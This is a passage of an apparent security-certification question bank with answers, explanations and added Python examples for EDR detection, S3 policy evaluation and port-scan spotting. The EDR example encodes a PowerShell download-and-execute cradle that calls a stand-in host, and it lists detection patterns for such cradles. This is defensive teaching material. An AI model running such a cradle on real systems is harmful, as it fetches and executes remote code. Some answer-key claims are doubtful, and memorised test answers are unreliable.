Authentication logs are most critical for detecting privilege escalation attacks because they record user identity changes, such as the use of 'su' or 'sudo' commands, and account modifications like group membership changes. A SIEM can correlate these events with other logs to identify anomalous privilege transitions, such as a standard user suddenly acquiring administrative rights, which is a hallmark of privilege escalation.

Exam trap

The trap here is that candidates often choose firewall logs or DNS logs because they associate them with detecting attacks in general, but the question specifically targets privilege escalation, which requires logs that capture user identity and privilege changes, not network-level events.

How to eliminate wrong answers

Option B (DNS logs) is wrong because DNS logs primarily track domain name resolution queries and are useful for detecting command-and-control (C2) traffic or data exfiltration, not direct privilege escalation events. Option C (Firewall logs) is wrong because firewall logs record network traffic allowed or blocked based on IP addresses and ports, which can indicate lateral movement but do not capture the user-level account changes or privilege transitions that define privilege escalation. Option D (Web server logs) is wrong because web server logs record HTTP requests and responses, which are valuable for detecting web application attacks like SQL injection or cross-site scripting, but they do not directly log operating system-level privilege changes or authentication events.

30
MCQmedium

A network administrator finds the above log entry. The source IP 192.168.1.10 is a user workstation. What does this log entry indicate?

A.An external host attempted to connect to the workstation on port 80
B.The firewall detected an intrusion attempt from the workstation
C.The workstation attempted to access a web server on the internet and the traffic was blocked by an inbound ACL
D.The workstation successfully connected to a web server on the internet
AnswerC

The ACL 'OUTSIDE_IN' is applied to the outside interface and denied the traffic.

Why this answer

Option C is correct because the entry's source is the workstation (192.168.1.10) and the destination is an internet address on TCP port 80, so it records the workstation's outbound HTTP request, and the action is 'denied' by an ACL applied inbound. An inbound ACL filters packets as they enter an interface, so the request was dropped on its way through the firewall rather than by the web server; the log shows an attempt, not a completed connection.

Exam trap

ISC2 often tests the distinction between inbound and outbound ACLs. The trap is reading the source field as 'the attacker': candidates assume a denied packet must have come from outside and choose Option A, when the source is the internal workstation and the entry records its own outbound request being denied.

How to eliminate wrong answers

Option A is wrong because 192.168.1.10 is a private RFC 1918 address belonging to the internal workstation; it is the source of the packet, not its target, and such an address would not legitimately originate from an external host. Option B is wrong because the log entry does not indicate any intrusion detection signature or alert; it simply shows a denied packet based on an ACL rule, which is a standard firewall operation, not an intrusion detection system (IDS) event. Option D is wrong because the log explicitly shows the action as 'denied', meaning the traffic was blocked, not successfully connected.

31
MCQeasy

Which of the following is the PRIMARY purpose of a business impact analysis (BIA) in business continuity planning?

A.Identify critical business functions and dependencies
B.Develop and test the continuity plan
C.Determine recovery time objectives (RTO) and recovery point objectives (RPO)
D.Create the business continuity plan document
AnswerA

BIA focuses on impact and prioritization.

Why this answer

The primary purpose of a business impact analysis (BIA) is to identify critical business functions and their dependencies on resources such as personnel, systems, data, and third-party services. This identification drives all subsequent continuity planning by quantifying the impact of disruptions and establishing the basis for recovery strategies. Without a BIA, recovery objectives and plans would be based on assumptions rather than empirical data about operational priorities.

Exam trap

The trap here is that candidates confuse the BIA's primary purpose with its outputs (RTO/RPO), but the BIA is fundamentally about identifying what is critical and why, not setting the numerical targets themselves.

How to eliminate wrong answers

Option B is wrong because developing and testing the continuity plan occurs after the BIA, using its outputs to design and validate recovery procedures; the BIA itself does not involve plan creation or testing. Option C is wrong because while RTO and RPO are derived from BIA findings, they are not the primary purpose—the BIA first identifies critical functions and dependencies, and then those metrics are calculated as part of the recovery strategy phase. Option D is wrong because creating the business continuity plan document is a separate step that synthesizes BIA results, recovery strategies, and procedures into a formal document; the BIA is an analytical input, not the document itself.

32
Multi-Selecteasy

Which THREE of the following are key activities in the recovery phase of incident response?

Select 3 answers
A.Identifying the root cause
B.Notifying law enforcement
C.Restoring systems from backups
D.Conducting post-incident review
E.Implementing containment measures
AnswersB, C, D

May be required depending on the incident.

Why this answer

Notifying law enforcement is listed here as a recovery-phase activity because it is external coordination performed once the immediate threat is contained and the organization can document what happened; it may be required depending on the incident's legal or regulatory context. Restoring systems from backups is the central recovery task: returning affected systems to a known-good state and confirming normal operation. Conducting the post-incident review closes the cycle by documenting the incident and feeding improvements back into preparation. Root cause identification belongs to eradication and containment measures to containment, so neither is a recovery activity.

Exam trap

The trap here is confusing the recovery phase with the eradication or containment phases, leading candidates to select root cause analysis (eradication) or containment measures (containment) as recovery activities, when recovery strictly involves restoring operations and post-incident documentation.

33
MCQhard

A security team is evaluating a new endpoint detection and response (EDR) solution. Which of the following capabilities is MOST important for detecting fileless malware?

A.Static malware analysis.
B.Signature-based detection.
C.Behavioral analysis and process monitoring.
D.Network traffic inspection.
AnswerC

Detects runtime behaviors like PowerShell abuse or process injection.

Why this answer

Option C is correct because behavioral analysis and process monitoring catch what fileless malware actually does at runtime: script hosts launched by unexpected parents, encoded or obfuscated PowerShell, in-memory code injection and living-off-the-land tool use. Signature-based detection and static analysis need a file on disk to inspect, which fileless variants avoid, and network inspection only sees the result of execution, if anything.
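
The kind of behavioral check an EDR applies to process-creation telemetry, as an added example that is not part of the question bank. It runs three constructed events through parent-child, command-line flag and encoded-command checks; the process names, command lines and the 192.0.2.7 URL are invented, and the encoded command is built from a known plaintext so the decode step can be verified.

```python
"""Added example (not part of the question bank): behavioral checks on
process-creation events of the kind an EDR collects, run over constructed
events.  Process names, command lines and the 192.0.2.7 URL are invented;
the -EncodedCommand value is generated here from a known plaintext."""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Flags that hide the console, skip profiles or bypass execution policy.
EVASION_FLAGS = re.compile(
    r"(?:^|\s)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|"
    r"executionpolicy\s+bypass|noni|noninteractive)\b", re.I)
# Download-and-execute cradles that show up once PowerShell is decoded.
CRADLE = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|Invoke-WebRequest|"
    r"Net\.WebClient|FromBase64String", re.I)
# PowerShell accepts any unique prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE text; return the text or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return the list of behavioral findings for one process-creation event."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmd = event["cmdline"]
    findings = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")
    if EVASION_FLAGS.search(cmd):
        findings.append("evasion-flags")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded-command")
        if CRADLE.search(decoded):
            findings.append("download-cradle-in-decoded-command")
    elif CRADLE.search(cmd):
        findings.append("download-cradle")
    return findings


# Constructed events: a macro-launched download cradle, a scheduled backup script
# started by the shell, and a spreadsheet spawning cmd.exe.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.7/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"parent": "EXCEL.EXE", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami /all"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(f"{e['parent']} -> {e['image']}: {analyze(e) or 'no findings'}")
```

None of these checks needs a file on disk: the signal is the parent process, the flags and the decoded command line, which is what a signature scanner never sees.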

34
MCQeasy

According to NIST SP 800-61, which phase of incident response immediately follows detection and analysis?

A.Recovery
B.Preparation
C.Eradication
D.Containment
AnswerD

Containment immediately follows detection.

Why this answer

According to NIST SP 800-61, the incident response lifecycle consists of four phases: Preparation, Detection & Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. The phase that immediately follows Detection & Analysis is Containment, because once an incident is detected and analyzed, the priority is to limit damage and prevent further spread before eradication and recovery can be safely performed.

Exam trap

The trap here is that candidates confuse the logical order of the NIST phases, often selecting Eradication because they think removing the threat is the immediate next step, but NIST explicitly places Containment before Eradication to ensure the incident is stabilized first.

How to eliminate wrong answers

Option A is wrong because Recovery occurs after Eradication, not immediately after Detection & Analysis; it involves restoring systems to normal operation. Option B is wrong because Preparation is the initial phase that occurs before any incident, not after detection. Option C is wrong because Eradication follows Containment in the NIST framework; you must first contain the threat to prevent further damage before removing malware or compromised accounts.

35
MCQmedium

During a forensic investigation, the team needs to preserve evidence from a running server. What is the FIRST step the team should take?

A.Capture a memory dump.
B.Create a disk image.
C.Shut down the server normally.
D.Unplug the network cable.
AnswerA

Preserves volatile evidence critical for analysis.

Why this answer

The first step in a forensic investigation of a running server is to capture a memory dump because volatile data (RAM) contains critical evidence such as running processes, network connections, encryption keys, and malware that would be lost if the system is powered off or altered. Preserving this volatile state before any other action ensures that the most transient evidence is secured, following the order of volatility principle. Capturing memory first prevents irreversible loss of data that cannot be recovered from disk or network captures.

Exam trap

The trap here is that candidates often confuse the urgency of preserving volatile data with the desire to immediately isolate the system from the network, leading them to choose unplugging the network cable first, but the correct forensic priority is to capture the most volatile evidence (memory) before any network or power actions.

How to eliminate wrong answers

Option B is wrong because creating a disk image is a non-volatile data acquisition step that should occur after capturing memory, as disk imaging does not preserve volatile evidence like running processes or encryption keys. Option C is wrong because shutting down the server normally would cause the operating system to cleanly terminate processes, potentially destroying evidence such as temporary files, network connections, and memory-resident malware, and may trigger anti-forensic mechanisms. Option D is wrong because unplugging the network cable, while it may prevent remote tampering, is not the first step; it should be performed after memory capture to avoid disrupting network-based evidence (e.g., active connections, network traffic logs) that could be captured from memory first.

36
MCQeasy

During a security audit, an organization discovers that several employees are sharing a single generic account to access a critical database. Which principle of security operations is being violated?

A.Accountability
B.Separation of duties
C.Defense in depth
D.Least privilege
AnswerA

Account sharing removes the ability to trace actions to an individual, violating accountability.

Why this answer

Accountability requires that each individual user be uniquely identified and their actions traceable. Sharing a generic account breaks this chain because the audit logs cannot attribute specific database operations (e.g., SELECT, UPDATE, DELETE) to a particular employee, making it impossible to hold anyone responsible for misuse or errors.

Exam trap

The trap here is that candidates confuse the lack of individual accountability with the principle of least privilege, assuming that sharing a generic account automatically means excessive permissions, when the real violation is the inability to uniquely identify and trace user actions.

How to eliminate wrong answers

Option B is wrong because separation of duties involves splitting critical tasks among multiple people to prevent fraud (e.g., requiring two different users to authorize and execute a transaction), which is not directly violated by shared accounts. Option C is wrong because defense in depth is a layered security strategy (e.g., firewalls, IDS, encryption) that remains intact even if a single account is shared; the violation here is about identity and audit, not defense layers. Option D is wrong because least privilege restricts users to the minimum permissions needed for their role; while shared accounts may also have excessive privileges, the core violation in this scenario is the inability to attribute actions to individuals, not the level of access rights.

37
MCQmedium

An organization is implementing a new backup strategy for its critical servers. The backup must support rapid restoration of individual files and allow for a recovery point objective (RPO) of no more than 15 minutes. Which backup method should be used for daily operations?

A.Full backup every 24 hours
B.Continuous data protection (CDP)
C.Differential backup every 6 hours
D.Incremental backup every 4 hours
AnswerB

CDP captures every write, enabling restoration to any point within seconds, meeting the RPO.

Why this answer

Continuous data protection (CDP) is the only backup method that can guarantee a recovery point objective (RPO) of 15 minutes or less because it captures every write to disk in real time or near-real time, enabling restoration to any point within the protection window. Full, differential, and incremental backups all rely on periodic snapshots, which inherently introduce gaps that exceed a 15-minute RPO unless the interval is shorter than 15 minutes, which is impractical for daily operations.

Exam trap

The trap here is that candidates may confuse the backup method's recovery time objective (RTO) with the recovery point objective (RPO), or assume that frequent incremental backups (e.g., every 4 hours) can achieve a 15-minute RPO, but the RPO is determined by the backup interval, not the method's efficiency.

How to eliminate wrong answers

Option A is wrong because a full backup every 24 hours provides an RPO of up to 24 hours, far exceeding the 15-minute requirement. Option C is wrong because a differential backup every 6 hours still leaves up to 6 hours of potential data loss between backups. Option D is wrong because an incremental backup every 4 hours results in an RPO of up to 4 hours, which does not meet the 15-minute threshold.

38
MCQmedium

A healthcare organization is implementing a new SIEM solution to centralize log management from its network devices, servers, and applications. The compliance team requires that all logs be retained for at least one year to meet HIPAA regulations. The SIEM platform has limited storage capacity and uses a hot/warm/cold tier architecture. The system currently ingests about 500 GB of logs per day. The security team wants to ensure that critical logs (e.g., authentication failures, privilege escalations) remain immediately searchable for at least 90 days, while less critical logs can be moved to cheaper storage after 30 days. What is the most cost-effective storage strategy that meets all requirements?

A.Store all logs in hot storage for 90 days, then archive to cold storage indefinitely.
B.Store only critical logs in hot storage for 1 year, delete non-critical logs after 30 days.
C.Store all logs in hot storage for 30 days, then delete them after 90 days.
D.Store critical logs in hot storage for 90 days, then move all logs to warm/cold storage for the remainder of the year.
AnswerD

Meets both immediate searchability and long-term retention cost-effectively.

Why this answer

Option D is correct because it aligns the SIEM's hot/warm/cold tier architecture with the organization's retention and searchability requirements. Critical logs remain in hot storage for 90 days for immediate searching, then all logs are moved to cheaper warm/cold storage for the remaining 275 days to meet the one-year HIPAA retention mandate. This balances cost efficiency with compliance, avoiding unnecessary hot storage costs for non-critical logs beyond 30 days.

Exam trap

The trap here is assuming that all logs must be treated identically, or that only critical logs fall under the retention requirement. The one-year retention the compliance team derived from HIPAA applies to all logs; tiered storage satisfies it cost-effectively by separating searchability (hot tier) from retention (warm/cold tiers).

How to eliminate wrong answers

Option A is wrong because keeping every log in hot storage for 90 days pays hot-tier prices for non-critical logs that only need 30 days there, and archiving indefinitely has no disposal point, so storage keeps growing beyond the one-year requirement. Option B is wrong because deleting non-critical logs after 30 days violates the one-year retention requirement, which covers all logs, not just critical ones. Option C is wrong because deleting all logs after 90 days fails the one-year retention mandate entirely, and critical logs would not remain searchable for the required 90 days.

39
MCQhard

Refer to the exhibit. What is the security risk of this S3 bucket policy?

A.It only allows read from a specific IP
B.It allows public read access to all objects
C.It denies all access
D.It allows any IP to write objects
AnswerD

PutObject has no IP restriction.

Why this answer

The S3 bucket policy in the exhibit grants `s3:PutObject` permission to `Principal: *` (anyone) without any condition restricting the source IP. This means any unauthenticated user on the internet can upload objects to the bucket, leading to potential data corruption, storage cost abuse, or malware hosting. Option D correctly identifies this risk because the policy allows any IP to write objects.

Exam trap

The trap here is that candidates focus on the obvious public read access (Option B) and overlook the more dangerous public write permission, which is the primary security risk in this policy.

How to eliminate wrong answers

Option A is wrong because the policy does not restrict read access to a specific IP; it grants `s3:GetObject` to `Principal: *` with no IP condition, making it publicly readable from any IP. Option B is wrong because while the policy does allow public read access, the question asks for the security risk, and the more severe risk is the unrestricted write permission (PutObject) that can lead to data injection or abuse. Option C is wrong because the policy explicitly allows both read and write actions, so it does not deny all access.
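
A minimal bucket-policy evaluator covering the two exhibits that are not reproduced on the page (question 23's IP-conditioned read policy and this question's public-write policy), as an added example that is not the question bank's or AWS's code. The policy documents are constructed to match the explanations: for question 23 an Allow on 10.0.0.0/8 plus a Deny with NotIpAddress on 10.100.0.0/16, and alongside it the IpAddress variant the trap describes; for question 39 an Allow of GetObject and PutObject to everyone with no condition. The evaluator implements only the IAM evaluation order (explicit Deny beats Allow, otherwise implicit deny) and the aws:SourceIp operators these exhibits use; the bucket name is invented.

```python
"""Added example (not part of the question bank): a minimal evaluator for the
bucket-policy exhibits in questions 23 and 39.  The policy documents below are
constructed to match the page's explanations; the bucket name is invented.
Implements explicit-Deny-wins, implicit deny, and the IpAddress / NotIpAddress
operators on aws:SourceIp, nothing more."""
from ipaddress import ip_address, ip_network

BUCKET = "arn:aws:s3:::example-bucket"  # constructed bucket name


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _glob_match(patterns, value):
    """IAM-style matching: exact, '*', or a trailing-wildcard prefix."""
    for p in _as_list(patterns):
        if p == "*" or p == value or (p.endswith("*") and value.startswith(p[:-1])):
            return True
    return False


def _is_public(stmt):
    return stmt.get("Principal") in ("*", {"AWS": "*"})


def _condition_holds(stmt, source_ip):
    """Evaluate IpAddress / NotIpAddress on aws:SourceIp; no Condition means 'always'."""
    ip = ip_address(source_ip)
    for operator, kv in stmt.get("Condition", {}).items():
        cidrs = [ip_network(c) for c in _as_list(kv.get("aws:SourceIp", []))]
        in_any = any(ip in c for c in cidrs)
        if operator == "IpAddress" and not in_any:
            return False
        if operator == "NotIpAddress" and in_any:
            return False
    return True


def evaluate(policy, action, resource, source_ip):
    """Decision for an anonymous request: 'Allow' or 'Deny'."""
    decision = "Deny"  # implicit deny until an Allow matches
    for stmt in policy["Statement"]:
        if not _is_public(stmt):
            continue
        if not (_glob_match(stmt["Action"], action) and _glob_match(stmt["Resource"], resource)):
            continue
        if not _condition_holds(stmt, source_ip):
            continue
        if stmt["Effect"] == "Deny":
            return "Deny"  # explicit Deny wins wherever it sits in the list
        decision = "Allow"
    return decision


def public_write_statements(policy):
    """Question 39's risk: an Allow to everyone on s3:PutObject with no Condition."""
    return [s for s in policy["Statement"]
            if s["Effect"] == "Allow" and _is_public(s)
            and _glob_match(s["Action"], "s3:PutObject") and not s.get("Condition")]


CONFIDENTIAL = BUCKET + "/confidential/*"
OBJ = BUCKET + "/confidential/report.csv"
POLICY_Q23 = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": CONFIDENTIAL,
     "Condition": {"IpAddress": {"aws:SourceIp": "10.0.0.0/8"}}},
    {"Effect": "Deny", "Principal": "*", "Action": "s3:GetObject", "Resource": CONFIDENTIAL,
     "Condition": {"NotIpAddress": {"aws:SourceIp": "10.100.0.0/16"}}},
]}
# The variant the exam trap describes: the same Deny written with IpAddress instead.
POLICY_Q23_TRAP = {"Version": "2012-10-17", "Statement": [
    POLICY_Q23["Statement"][0],
    {"Effect": "Deny", "Principal": "*", "Action": "s3:GetObject", "Resource": CONFIDENTIAL,
     "Condition": {"IpAddress": {"aws:SourceIp": "10.100.0.0/16"}}},
]}
POLICY_Q39 = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": BUCKET + "/*"},
]}

if __name__ == "__main__":
    for ip in ("10.100.5.5", "10.20.0.1", "192.0.2.1"):
        print(ip, "NotIpAddress deny:", evaluate(POLICY_Q23, "s3:GetObject", OBJ, ip),
              "| IpAddress deny:", evaluate(POLICY_Q23_TRAP, "s3:GetObject", OBJ, ip))
    print("public write statements in Q39 policy:", len(public_write_statements(POLICY_Q39)))
```

Flipping one operator in the Deny moves the allowed set from "only 10.100.0.0/16" to "everything in 10.0.0.0/8 except 10.100.0.0/16", which is the whole difference between options D and A in question 23. The lint at the end is the check to run before publishing any bucket policy: an unconditioned Allow to a public principal on a write action is a finding regardless of what the read statements say.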

40
MCQhard

In a virtualized environment, which security control is most effective for isolating VMs from each other?

A.Host-based firewall on each VM
B.Physical separation
C.Virtual LAN (VLAN) segmentation
D.Hypervisor-level network policies
AnswerD

Enforced by hypervisor, most effective for isolation.

Why this answer

Hypervisor-level network policies, such as virtual switches with port groups and VLAN tagging, enforce isolation directly at the hypervisor layer, ensuring that VM traffic is segmented without relying on guest OS configurations. This control is independent of the VM's own firewall settings and can prevent lateral movement even if a VM is compromised, because the hypervisor mediates all network I/O.

Exam trap

The trap here is that candidates often confuse VLAN segmentation (Option C) as the primary isolation mechanism, but in a virtualized environment, VLANs are configured at the hypervisor level as part of virtual switch policies, making 'Hypervisor-level network policies' the more precise and encompassing answer.

How to eliminate wrong answers

Option A is wrong because a host-based firewall on each VM relies on the guest OS, which can be bypassed if the VM is compromised or if the firewall is misconfigured; it does not provide isolation at the hypervisor level. Option B is wrong because physical separation defeats the purpose of virtualization and is not a practical control within a virtualized environment; it refers to separate physical hosts, not VM-to-VM isolation. Option C is wrong because VLAN segmentation operates at Layer 2 of the network and can be effective, but it is configured on physical switches and does not inherently control traffic between VMs on the same hypervisor unless combined with hypervisor-level policies; it is an external control that can be bypassed if the hypervisor's virtual switch is not properly configured.

41
MCQmedium

A security team is reviewing firewall logs and sees many dropped packets from an external IP. What type of attack is most likely?

A.Man-in-the-middle
B.Port scanning
C.SQL injection
D.Phishing
AnswerB

Multiple dropped packets suggest scanning for open ports.

Why this answer

Port scanning is the most likely attack because it involves an external IP sending packets to multiple ports on a target system to identify open services. Firewalls log these as dropped packets when they block unsolicited inbound traffic to closed or filtered ports, which is a common signature of reconnaissance activity.

Exam trap

The trap here is that candidates may confuse port scanning with a denial-of-service (DoS) attack, but port scanning is reconnaissance, not resource exhaustion, and the key clue is the pattern of dropped packets to multiple ports from a single IP.

How to eliminate wrong answers

Option A is wrong because a man-in-the-middle attack requires the attacker to intercept and potentially modify communications between two parties, which would not typically manifest as dropped packets from a single external IP; instead, it involves ARP spoofing, DNS poisoning, or session hijacking. Option C is wrong because SQL injection targets web application input fields to manipulate database queries, not network-layer packet filtering, and would not appear as dropped packets in firewall logs. Option D is wrong because phishing is a social engineering attack that uses deceptive emails or websites to steal credentials, not a network-level activity that generates dropped packets from an external IP.
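
The pattern behind this question and question 28, many distinct destination ports from one source inside a short window, turned into a check over constructed firewall deny lines, as an added example that is not part of the question bank. The log format, addresses and timestamps are invented (adapt the regex to the firewall's actual syslog); the sample also includes a source that retries a single blocked port, which should not be reported as a scan.

```python
"""Added example (not part of the question bank): port-scan detection over
constructed firewall deny lines for questions 28 and 41.  The log format,
addresses and timestamps are invented for the example."""
import re
from collections import defaultdict
from datetime import datetime

LINE = re.compile(r"^(?P<ts>\S+) (?P<action>\w+) (?P<proto>\w+) "
                  r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")


def parse(lines):
    """Yield parsed events; lines that do not match are skipped rather than crash the job."""
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            e = m.groupdict()
            e["ts"] = datetime.fromisoformat(e["ts"])
            e["dport"] = int(e["dport"])
            yield e


def find_scans(events, window_s=60, min_ports=5):
    """For each (src, dst) pair, slide a window over its denied packets and report the
    largest number of distinct destination ports seen inside the window.  One port
    hit many times (a single disallowed service being retried) does not qualify."""
    by_pair = defaultdict(list)
    for e in events:
        if e["action"].lower() == "deny":
            by_pair[(e["src"], e["dst"])].append((e["ts"], e["dport"]))
    scans = {}
    for pair, hits in by_pair.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while (hits[end][0] - hits[start][0]).total_seconds() > window_s:
                start += 1
            ports = {p for _, p in hits[start:end + 1]}
            if len(ports) >= min_ports:
                scans[pair] = max(len(ports), scans.get(pair, 0))
    return scans


# Constructed log: one host walking common ports on 192.168.1.10, one external host
# retrying a single blocked port, and a benign pair that touches only two ports.
SAMPLE_LOG = """\
2024-05-01T10:00:01 deny tcp 10.0.0.2:51512 -> 192.168.1.10:21
2024-05-01T10:00:01 deny tcp 10.0.0.2:51513 -> 192.168.1.10:22
2024-05-01T10:00:02 deny tcp 10.0.0.2:51514 -> 192.168.1.10:23
2024-05-01T10:00:02 deny tcp 10.0.0.2:51515 -> 192.168.1.10:25
2024-05-01T10:00:03 deny tcp 10.0.0.2:51516 -> 192.168.1.10:80
2024-05-01T10:00:03 deny tcp 10.0.0.2:51517 -> 192.168.1.10:443
2024-05-01T10:00:04 deny tcp 10.0.0.2:51518 -> 192.168.1.10:3389
2024-05-01T10:00:10 deny tcp 203.0.113.50:44021 -> 192.168.1.10:8080
2024-05-01T10:00:15 deny tcp 203.0.113.50:44022 -> 192.168.1.10:8080
2024-05-01T10:00:20 deny tcp 203.0.113.50:44023 -> 192.168.1.10:8080
2024-05-01T10:00:25 deny tcp 203.0.113.50:44024 -> 192.168.1.10:8080
2024-05-01T10:00:30 deny tcp 203.0.113.50:44025 -> 192.168.1.10:8080
2024-05-01T10:01:00 deny tcp 10.0.0.9:40100 -> 192.168.1.10:22
2024-05-01T10:01:05 deny tcp 10.0.0.9:40101 -> 192.168.1.10:80
2024-05-01T10:01:07 permit tcp 10.0.0.9:40102 -> 192.168.1.10:443
"""


def scans_in_log(text=SAMPLE_LOG):
    return find_scans(parse(text.splitlines()))


if __name__ == "__main__":
    for (src, dst), n in scans_in_log().items():
        print(f"possible port scan: {src} -> {dst}, {n} distinct ports within 60 s")
```

Only 10.0.0.2 is reported. The external host hammering 8080 produces just as many deny lines, but on one port, which is the difference between a scan and a blocked service that the exam's wrong answers blur together.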

42
MCQmedium

Refer to the exhibit. The ACL is applied inbound on a perimeter router. A security analyst notices that web traffic to an internal server is being blocked. What is the most likely cause?

A.The connection is stateful and not returning traffic
B.The source address is not permitted
C.The ACL is applied outbound incorrectly
D.The web server is using a port other than 80 or 443
AnswerD

Only ports 80 and 443 are allowed for TCP.

Why this answer

Option D is correct because the ACL is applied inbound on the perimeter router, meaning it inspects traffic as it enters the interface. If the web server is using a non-standard port (e.g., 8080 or 8443) instead of the well-known ports 80 or 443, the ACL will not match the permit statement for HTTP/HTTPS traffic, causing the packets to be dropped by the implicit deny any at the end of the ACL. This is a common misconfiguration when administrators assume all web traffic uses default ports.

Exam trap

ISC2 often tests the misconception that all web traffic uses ports 80 or 443, leading candidates to overlook the possibility of non-standard port configurations, while also distracting with stateful vs. stateless ACL behavior.

How to eliminate wrong answers

Option A is wrong because an ordinary IOS ACL is stateless and does not track connection state (the ACL in the exhibit must be an extended ACL, since it matches TCP ports, but that does not make it stateful); stateful inspection requires a firewall feature or a reflexive ACL, not a plain inbound ACL on a router. Option B is wrong because the source address is likely permitted (the analyst sees web traffic being blocked, not all traffic), and the ACL would explicitly deny or permit based on source IP; if the source were not permitted, the traffic would be blocked entirely, not just web traffic. Option C is wrong because the ACL is explicitly stated as applied inbound, not outbound; applying it outbound would affect traffic leaving the interface, not incoming web requests to the internal server.

43
MCQmedium

A company is deploying a new web application and needs to ensure that only HTTPS traffic is allowed. What is the MOST effective way to enforce this at the network perimeter?

A.Allow TCP port 443 only and block port 80.
B.Configure the firewall to allow TCP port 80 and 443.
C.Use a proxy server to decrypt all traffic.
D.Block TCP port 443.
AnswerA

Only allows HTTPS, rejecting all HTTP connections.

Why this answer

Blocking TCP port 80 and allowing only TCP port 443 at the network perimeter ensures that only HTTPS traffic can enter or leave the network. This is the most effective method because it directly enforces the protocol restriction at the firewall, preventing any HTTP traffic from bypassing encryption. Allowing both ports would permit unencrypted HTTP, while using a proxy or blocking port 443 would either add unnecessary complexity or deny legitimate HTTPS traffic.

Exam trap

The trap here is that candidates may think allowing both ports 80 and 443 is acceptable for flexibility, but the question explicitly requires only HTTPS, so blocking port 80 is essential to enforce encryption at the perimeter.

How to eliminate wrong answers

Option B is wrong because allowing both TCP port 80 and 443 permits unencrypted HTTP traffic, which violates the requirement to allow only HTTPS. Option C is wrong because using a proxy server to decrypt all traffic does not enforce the restriction at the network perimeter; it adds overhead and may introduce privacy or compliance issues, and it does not block port 80 by itself. Option D is wrong because blocking TCP port 443 would deny all HTTPS traffic, which is the opposite of the requirement to allow only HTTPS.

44
MCQmedium

An organization is required to retain audit logs for seven years due to regulatory compliance. The logs are currently stored on a file server that is approaching capacity. What is the BEST way to manage log storage?

A.Reduce the logging level to generate less data.
B.Delete logs older than one year.
C.Increase the frequency of log rotation.
D.Compress logs and move them to low-cost archival storage.
AnswerD

Reduces storage footprint and complies with retention.

Why this answer

Option D is correct because it balances the seven-year retention requirement with storage constraints by compressing logs (reducing size) and moving them to low-cost archival storage (e.g., cold storage or tape). This preserves data integrity and accessibility for compliance audits while freeing up space on the primary file server.

Exam trap

The trap here is that candidates may confuse operational efficiency (log rotation) with long-term retention, failing to recognize that compliance mandates absolute retention periods that cannot be circumvented by deletion or reduced logging.

How to eliminate wrong answers

Option A is wrong because reducing the logging level would omit critical security events, violating the principle of complete audit trails and potentially failing compliance requirements. Option B is wrong because deleting logs older than one year directly violates the seven-year retention mandate, exposing the organization to regulatory penalties. Option C is wrong because increasing log rotation frequency merely creates more files without addressing the underlying capacity issue; it does not reduce total data volume or extend retention capabilities.

45
MCQeasy

A company's security policy requires that all removable media be encrypted. An employee plugs in a USB drive and is prompted to format it before use. After formatting, the drive is not encrypted. What is the most likely reason?

A.The employee did not enable encryption (e.g., BitLocker To Go) after formatting
B.The USB drive hardware does not support encryption
C.The operating system does not support encryption of removable media
D.The employee used the wrong file system (FAT32 vs NTFS)
AnswerA

Encryption is a separate step that must be explicitly enabled, e.g., via BitLocker To Go.

Why this answer

Option A is correct because BitLocker To Go, the native encryption feature for removable drives in Windows, is not automatically enabled when a USB drive is formatted. The employee must explicitly enable encryption (e.g., via BitLocker To Go in Control Panel or by right-clicking the drive and selecting 'Turn on BitLocker') after formatting. Without this step, the drive remains unencrypted, violating the security policy.

Exam trap

The trap here is that candidates assume formatting a drive automatically applies encryption (e.g., thinking BitLocker is enabled by default), when in fact encryption must be explicitly activated after formatting.

How to eliminate wrong answers

Option B is wrong because modern USB drives, even basic ones, support encryption at the software level (e.g., BitLocker To Go) regardless of hardware encryption capabilities; the policy requires encryption, which can be achieved via software. Option C is wrong because Windows (the most common OS for such scenarios) fully supports encryption of removable media via BitLocker To Go, which is available in Pro, Enterprise, and Education editions. Option D is wrong because the file system (FAT32 vs NTFS) does not determine encryption; BitLocker To Go works with both, though NTFS is recommended for full feature support, and the lack of encryption is due to the employee not enabling it, not the file system choice.

46
Multi-Selectmedium

Which TWO of the following are effective methods for detecting unauthorized access to a network? (Choose two.)

Select 2 answers
A.Vulnerability scanner
B.Antivirus software
C.Security information and event management (SIEM)
D.Firewall rule review
E.Intrusion detection system (IDS)
AnswersC, E

Correlates logs from multiple sources to detect incidents.

Why this answer

